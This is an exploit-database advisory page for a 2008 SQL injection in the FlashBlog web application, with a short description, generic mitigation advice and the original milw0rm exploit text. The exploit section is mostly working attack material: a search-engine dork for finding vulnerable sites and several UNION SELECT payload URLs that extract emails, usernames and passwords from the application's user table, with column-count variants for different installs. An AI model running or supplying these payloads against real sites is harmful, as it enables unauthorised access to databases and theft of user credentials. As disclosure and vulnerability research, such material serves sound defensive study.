FlashBlog sql Inyeccion

vendor:

N/A

by:

Her0

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The vulnerability exists due to insufficient filtration of user-supplied input passed via the 'articulo_id' parameter to '/php/leer_comentarios.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. Successful exploitation of this vulnerability may allow an attacker to gain access to sensitive information from the database, modify data, delete data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered, including data from cookies, query strings, and hidden fields. Special characters should be removed or replaced with their HTML entity equivalents.

Source

Exploit-DB raw data:

###############################################################################
#
#   Name   : FlashBlog sql Inyeccion
#   Author : Her0
#   Dork   : "flashblog", allinurl:flashblog.html
#   Greetz : Komtec1,Freak,Knet,Boer,ka0x
#
###############################################################################

Proof of Concept :

    http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*
   
   
The colums from host to host are diferent: all resolve =D
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/usuarios/*
/php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/usuarios/*

   
###############################################################################
#
# Mexico 2008, Thanks all my friends, I love the whisky xD
#
###############################################################################

# milw0rm.com [2008-05-28]